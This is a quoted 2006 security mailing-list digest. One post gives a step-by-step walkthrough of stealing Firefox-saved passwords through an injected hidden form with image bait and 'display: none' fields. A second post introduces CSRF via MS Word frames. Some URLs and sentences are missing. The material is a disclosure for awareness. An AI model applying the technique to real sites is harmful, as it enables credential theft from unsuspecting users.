Thread-topic: Stealing FF passwords and CSRF with MS Word
> Message: 2
> Date: Fri, 24 Nov 2006 13:41:55 +0000
> From: pagvac <unknown.pentester@xxxxxxxxx>
> Subject: [Full-disclosure] RCSR fun: stealing FF passwords the easy
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Content-Type: text/plain; charset="iso-8859-1"
> RCSR (Reverse Cross-Site Request) attacks discovered by Robert Chapin,
> make the theft of passwords in Firefox extremely trivial. I encourage
> you to try the attack as it can be kind of a shocking experience.
> 1. User logs into www.target.com through a typical HTML login form
> 2. Firefox asks the user if he/she wants to save the password -
> provided that FF never asked the user to save the password for that
> site before ("Remember passwords for sites" under "Options/Security"
> must be *enabled*)
> 3. Victim user clicks on "Remember"
> 4. Victim user accesses an HTML page on www.target.com containing an
> injected HTML form with the username and password input names *equal*
> to the legitimate login form from step 1
> 5. Firefox fills out automatically the form with the original username
> and password values
> 6. Victim user clicks on a malicious link
> 7. Credentials get sent to evil site!
> Now, the form can be completely invisible by adding a bit of HTML to
> the form inputs. I managed to create a form in which all you need is
> trick the victim user to click on an image.
> Attack walk through:
> 1. Enter any fake credentials on
> http://ikwt.com/projects/RCSR/legit_form.html and click on "Login"
> 2. If "Remember passwords for sites" is enabled, FF should prompt you
> to save the password.
> 3. Click on "Remember"
> 4. Now, in order to illustrate that FF will automatically fill in the
> credentials on any form located on the same site which uses input
> names *equal* the the legitimate form access the following URL:
> If it worked, you should see the username and password field filled in
> automatically by FF. Of course, an evil form like this looks very
> suspicious, but this is just an example to make the point that FF
> trusts and fills in the form simply because it's located on the same
> site and uses input names equal to the legitimate form.
> Now, in order to make our evil form more effective we just added the
> following line the in the username and password fields:
> style="display: none;"
> Finally, we change our submit button for an image that will make a
> good bait. In this case we choose beautiful Scarlett Johansson :-)
> If you click on the image, you should see your credentials forwarded
> to Google within the URL:
> plain HTML tags. Also, there is *no* patch yet. Apparently this has
> been widely exploited on myspace. I recommend everyone to research
> this attack as it's highly exploitable on sites in which users can
> insert HTML - either though legitimate features (i.e.: posts) or by
> exploiting security bugs such as HTML injection
> - tested successfully on Mozilla Firefox 2.0
> the 'submit()' method (only visiting the evil page is required in this
> Check out the following links for more info:
> http://www.kriptopolis.org/robo-de-contrasenas-en-firefox (in Spanish)
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: FF_remember_passwords.JPG
> Type: image/jpeg
> Size: 8310 bytes
> Desc: not available
> Url :
> Message: 7
> Date: Fri, 24 Nov 2006 19:12:32 +0000
> From: "David Kierznowski" <david.kierznowski@xxxxxxxxx>
> Subject: [Full-disclosure] CSRF with MS Word
> To: full-disclosure@xxxxxxxxxxxxxxxxx, "Webappsec Mail List"
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
> CSRF with MS Word
> Our attack vector is found in exploiting MSWord's frame capabilities:
> By creating malicious frames in a document and pointing them to a
> malicious URL, we can exploit multiple, persistent (well almost, this
> is limited) CSRF vulnerabilities (and possibly the browser).